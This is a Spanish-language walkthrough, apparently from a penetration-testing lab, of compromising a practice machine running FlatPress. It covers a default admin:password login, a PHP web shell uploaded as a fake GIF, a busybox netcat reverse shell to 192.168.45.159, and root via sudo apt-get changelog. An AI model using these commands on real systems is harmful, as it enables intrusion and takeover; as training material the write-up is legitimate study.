MAQUINA PASS (FlatPass 1.2 Vuln 'file upload bypass RCE' Privesc 'apt get')

Enumere los puertos de la maquina.

nmap -p- --open -sS --min-rate 3000 -vvv -n -Pn pass Basicscan.txt

Puertos encontrados: 22 ssh, 80 http y 8089 ()?

Realize un reconocimiento de los servicios que corren en esos puertos y sus versiones.

nmap -p22,80,8089 pass -oN Fullscan.txt

Continue inspeccionando los servidores web que corren por el puerto 80 y 8089.

Use whatweb para ver las tecnologias que corren en los servidores web. Puerto 80:

Puerto 8089:

Me centre en el puerto 8089, este servidor web contiene un cms llamado FlatPress de version 1.2.1..

En la web observe que tengo un panel de sesión en el apartado LOGIN, luego en google busque las credenciales por defecto encontrando que se puede utilizar > admin : password

Luego de colocar las credenciales accedí al panel de administración como usuario admin.

Al tener la versión del CMS busque vulnerabilidades a través de searchsploit.

Luego de descargar el exploit RCE de FLASTPRESS V1.13, inspeccione como funcionaba el exploit.

El exploit lo que indica es que a través del apartado UPLOADER se sube una shell en php indicándole a este que es un gif.

Este es la shell que utilice.

Ya subido la shell con, pincho en shell.php en el sitio de "MEDIA MANAGER" y esta me redirige indicándome en la web el GIF89a.

Luego agrego después de signo "?" la cmd=whoami, lo cual me muestra por web que usuario soy dentro del sitio.

Para acceder de forma remota use la siguiente revershell:

busybox nc 192.168.45.159 80 -e bash

Luego de enviar la revshell, mi netcat recibe la conexión.

Una vez dentro busque la forma de acceder al usuario root, para ello ejecute sudo -l el cual me mostro por consola que puedo usar el binario apt-get sin contraseñas.

Ejecute el siguiente comando: sudo /user/bin/apt-get changelog apt >>> esto abre una archivo de texto el cual una vez abierto coloco lo siguiente: >>> !/bin/bash. Una vez hecho esto ya soy usuario root.

gtfobins >>> web.

POC:

https://github.com/flatpressblog/flatpress/issues/152

PreviousMAQUINA NUKEM (WORDPRESS 5.5.1 ABUSED PLUGINS SIMPLE LIST 4.4.2 PIVOTING USER MYSQL PASSOWORD PIVOTING PUERTO Y TUNELIZACION SSH PRIVESC 'DOSBOX' CAMBIO DE PERMISOS SUDOERS CON REMMINA)NextMAQUINA PELICAN (RCE ZooKeeper v1 Web UI + RCE + PrivEsc 'gcore pid + extract password 'strings' = root)

Last updated 11 months ago